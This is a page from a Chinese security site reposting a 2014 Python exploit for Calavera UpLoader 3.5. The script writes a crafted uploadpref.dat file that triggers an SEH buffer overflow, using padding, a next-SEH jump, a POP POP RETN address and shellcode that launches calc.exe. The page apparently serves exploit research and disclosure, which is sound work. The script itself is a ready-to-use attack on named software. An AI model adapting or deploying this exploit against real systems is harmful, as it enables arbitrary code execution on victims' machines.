首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Calavera UpLoader 3.5 - SEH Buffer Overflow
来源:Lacalavera@gmail.com 作者:Calavera 发布时间:2014-03-05  
#exploit por Daniel - La Calavera
#Email: Lacalavera@gmail.com
# Para CracksLatinoS
  
#relleno
  
rell = "\x41"* 477
rell1 = "\x42"* 4000
  
head = "\x41"* 8
head += "\x0d\x0a\x31\x0d\x0a"
head1 = "\x0d\x0a"
head2 = "170.1.1.0"
head2 +="\x0d\x0a"
head2 +="\x22"
head2 += "C:\Archivos2de2programa\Uploader!\Uploader!23151EXE"
head2 +="\x22"
  
  
# shellcode para calc.exe
  
shellcode = "\x33\xD2\xB2\x50\x80\xF2\x55\x52\xC6\x45"
shellcode += "\x31\x63\xC6\x45\x32\x61\xC6\x45\x33\x6C"
shellcode += "\xC6\x45\x34\x63\xC6\x45\x35\x2E\xC6\x45\x36\x65"
shellcode += "\xC6\x45\x37\x78\xC6\x45\x38\x65\x88\x45"
shellcode += "\x39\x8D\x45\x31\x50\xB9\x31\x75\x66\x31"
shellcode += "\x81\xF1\x69\x4D\x26\x31\xFF\xe1"
  
# Next SHE
Nshe = "\xeb\x06\x90\x90"
# POP POP RETN
PPR = "\x38\xbf\x40\x00"
  
explo = (head + rell + Nshe + PPR + shellcode + rell1 + head1 + head2)
arch = open ("uploadpref.dat", "w")
  
arch.write(explo)
arch.close

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MantisBT Admin SQL Injection A
·ALLPlayer M3U Buffer Overflow
·ALLPlayer 5.8.1 - (.m3u file)
·Windows Escalate UAC Protectio
·VCDGear 3.50 (.cue) - Stack Bu
·SolidWorks Workgroup PDM 2014
·HP Data Protector Backup Clien
·Kloxo Remote Root Exploit
·GetGo Download Manager 4.9.0.1
·GE Proficy CIMPLICITY gefebt.e
·KMPlayer 3.8.0.117 Buffer Over
·Total Video Player 1.3.1 (Sett
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved